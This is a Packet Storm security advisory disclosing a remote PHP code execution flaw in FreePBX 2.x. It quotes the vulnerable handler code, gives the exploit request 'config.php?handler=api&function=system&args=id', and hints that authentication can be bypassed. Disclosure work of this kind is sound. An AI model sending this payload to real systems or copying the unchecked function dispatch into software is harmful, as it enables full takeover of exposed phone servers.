the original cloud security

FreePBX 2.x Code Execution

FreePBX 2.x Code Execution
Posted Feb 11, 2014
Authored by i-Hmx

FreePBX 2.x suffers from a remote PHP code execution vulnerability due to a poor file validation methodology.

tags | advisory, remote, php, code execution
MD5 | 7ddfc02f5c58455311937c2f0fd2a496

FreePBX 2.x Code Execution

Change Mirror Download
App : Freepbx 2.x
download : schmoozecom.com
Author : i-Hmx
mail : n0p1337@gmail.com
Home : sec4ever.com , secarrays ltd

Freepbx is famous asterisk based distro used world wide , it suffer from many vulns actually
simple one is included here just as a "knock knock" for the "schmoozecom" team ;)
Here you will see damn obvious PHP code Execution vuln , which can be upgraded to RCE and also dump all box's data
You can have a look if you are interested

File : admin/libraries/view.functions.php

function fileRequestHandler($handler, $module = false, $file = false){
global $amp_conf;

switch ($handler) {
case 'reload':
// AJAX handler for reload event
$response = do_reload();
header("Content-type: application/json");
echo json_encode($response);
break;
case 'file':
/** Handler to pass-through file requests
* Looks for "module" and "file" variables, strips .. and only allows normal filename characters.
* Accepts only files of the type listed in $allowed_exts below, and sends the corresponding mime-type,
* and always interprets files through the PHP interpreter. (Most of?) the freepbx environment is available,
* including $db and $astman, and the user is authenticated.
*/
if (!$module || !$file) {
die_freepbx("unknown");
}
//TODO: this could probably be more efficient
$module = str_replace('..','.', preg_replace('/[^a-zA-Z0-9-\_\.]/','',$module));
$file = str_replace('..','.', preg_replace('/[^a-zA-Z0-9-\_\.]/','',$file));

$allowed_exts = array(
'.js' => 'text/javascript',
'.js.php' => 'text/javascript',
'.css' => 'text/css',
'.css.php' => 'text/css',
'.html.php' => 'text/html',
'.php' => 'text/html',
'.jpg.php' => 'image/jpeg',
'.jpeg.php' => 'image/jpeg',
'.png.php' => 'image/png',
'.gif.php' => 'image/gif',
);
foreach ($allowed_exts as $ext=>$mimetype) {
if (substr($file, -1*strlen($ext)) == $ext) {
$fullpath = 'modules/'.$module.'/'.$file;
if (file_exists($fullpath)) {
// file exists, and is allowed extension

// image, css, js types - set Expires to 24hrs in advance so the client does
// not keep checking for them. Replace from header.php
if (!$amp_conf['DEVEL']) {
header('Expires: '.gmdate('D, d M Y H:i:s', time() + 86400).' GMT', true);
header('Cache-Control: max-age=86400, public, must-revalidate',true);
}
header("Content-type: ".$mimetype);
ob_start();
include($fullpath);
ob_end_flush();
exit();
}
break;
}
}
die_freepbx("../view/not allowed");
break;
case 'api':
if (isset($_REQUEST['function']) && function_exists($_REQUEST['function'])) {
$function = $_REQUEST['function'];
$args = isset($_REQUEST['args'])?$_REQUEST['args']:'';

//currently works for one arg functions, eventually need to clean this up to except more args
$result = $function($args);
$jr = json_encode($result);
} else {
$jr = json_encode(null);
}
header("Content-type: application/json");
echo $jr;
break;
}
exit();
}

Function is called at admin/config.php at line 132

if (!in_array($display, array('noauth', 'badrefer'))
&& isset($_REQUEST['handler'])
) {
$module = isset($_REQUEST['module']) ? $_REQUEST['module'] : '';
$file = isset($_REQUEST['file']) ? $_REQUEST['file'] : '';
fileRequestHandler($_REQUEST['handler'], $module, $file);
exit();
}

Well , it's easy to be exploitd to get any php function executed
eg. system
config.php?handler=api&function=system&args=id
usually it require authentication , but using your mind you can get around it smoothly ;)
that's it

Sollution?
of course i would never leave you @ sec nightmares , just modify your firewall Rules and don't make your box exposed to the nasty internet world :D

can you sleep well now?
of course not , you may be already compromised and also backdoored with super tiny php backdoor , so you'd better to remove all php data,
download latest upgrade from schmoozecom , reboot your box and you are safe . . (Temporary) ;)

Have a good day

./Faris <The Awsome>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close